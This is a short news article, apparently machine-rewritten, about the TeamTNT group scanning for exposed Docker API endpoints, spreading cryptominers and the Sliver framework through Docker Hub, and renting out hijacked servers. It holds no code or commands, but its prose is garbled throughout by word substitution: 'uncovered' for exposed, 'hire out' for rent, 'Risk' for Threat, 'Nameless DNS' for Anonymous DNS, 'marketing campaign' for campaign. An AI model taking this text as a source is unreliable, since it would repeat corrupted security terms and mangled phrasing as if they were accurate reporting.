TeamTNT Targets Exposed Docker Servers for Cryptojacking

TeamTNT Recruits Docker Servers in New Cryptojacking Blitz

TeamTNT, a infamous cryptojacking group, is gearing up for a large-scale cyberattack marketing campaign concentrating on cloud-native environments. The group is understood for exploiting uncovered Docker daemons to mine cryptocurrencies and hire out compromised servers to 3rd events. In response to a report by Assaf Morag, director of risk intelligence at Aqua, TeamTNT is utilizing Docker Hub because the infrastructure to unfold malware, together with the Sliver malware, a cyber worm, and cryptominers.

Datadog not too long ago detected early indicators of the marketing campaign, which goals to compromise Docker environments and incorporate them right into a Docker Swarm. The marketing campaign focuses on mass-scanning for unauthenticated Docker API endpoints, with assaults initiated by a script that targets ports on thousands and thousands of IP addresses.

Monetizing Compromised Servers for Crypto Mining

As soon as the servers are compromised, TeamTNT makes use of them to mine cryptocurrencies like Monero. Moreover, they hire the computational energy of contaminated servers to different customers through Mining Rig Leases, a mining rental platform. This diversification highlights the maturity of their illicit enterprise mannequin. The group additionally switched from utilizing the Tsunami backdoor to the open-source Sliver command-and-control framework, a transfer that showcases their potential to evolve ways.

Wider Risk to Cloud Safety

The group’s persistent assaults contain executing malicious instructions through Docker containers and deploying an Alpine Linux picture by a compromised Docker Hub account. These campaigns not solely goal cloud environments for crypto mining but in addition additional unfold their malicious payloads by utilizing Nameless DNS (anondns) to cover their net servers.

Cryptocurrency mining stays a profitable goal for cybercriminals, with attackers utilizing compromised techniques to mine digital currencies like Monero with out the sufferer’s information. This permits risk actors to revenue whereas staying underneath the radar, emphasizing the necessity for higher cloud safety and monitoring to forestall such assaults.


Additionally learn:
Myths About Making Cash TapSwap Why Trending

Leave a Reply

Your email address will not be published. Required fields are marked *

x